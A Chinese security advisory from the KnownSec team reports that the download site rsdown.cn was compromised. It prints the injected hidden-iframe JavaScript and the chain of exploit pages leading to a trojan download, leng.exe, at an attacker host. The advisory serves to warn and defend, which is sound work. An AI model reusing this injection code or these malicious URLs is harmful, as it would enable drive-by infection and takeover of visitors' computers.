注册
登录
| 关键词: nbsp http 76 78 frame exe xxxvvvv new leng htm |
知道创宇安全团队(KnownSec team)于今天捕获 红软基地(http://www.rsdown.cn/)被植入恶意代码。 用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。 MalUrl:http://web.rsdown.cn/images/time.js 网页被嵌入恶意链接代码:document.write(”<iframe src=http://%78%78%78%76%76%76%76%2E%63%6E/new11/ming.htm?-2 width=0 height=0 border=0></iframe>”);} 挂马分析:[wide]http://www.rsdown.cn/ [script]http://web.rsdown.cn/images/time.js [frame]http://%78%78%78%76%76%76%76%2e%63%6e/new11/ming.htm?-2 [frame]http://%78%78%78%76%76%76%76%2e%63%6e/new11/index.htm [frame]http://%78%78%78%76%76%76%76%2e%63%6e/new11/flash.htm [frame]http://%78%78%78%76%76%76%76%2e%63%6e/new11/14.htm [exe]http://xxxvvvv.cn/leng.exe [frame]http://%78%78%78%76%76%76%76%2e%63%6e/new11/lz.htm [exe]http://xxxvvvv.cn/leng.exe [frame]http://%78%78%78%76%76%76%76%2e%63%6e/new11/office.htm [exe]http://xxxvvvv.cn/leng.exe [frame]http://%78%78%78%76%76%76%76%2e%63%6e/new11/bf.htm [exe]http://xxxvvvv.cn/leng.exe [frame]http://%78%78%78%76%76%76%76%2e%63%6e/new11/real.htm [exe]http://xxxvvvv.cn/leng.exe [frame]http://%78%78%78%76%76%76%76%2e%63%6e/new11/real.html [exe]http://xxxvvvv.cn/leng.exe [script]http://js.tongji.cn.yahoo.com/929904/ystat.js 最终下载病毒文件:http://xxxvvvv.cn/leng.exe 通过执行以上病毒文件,来达到完全控制访问者的系统。 知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
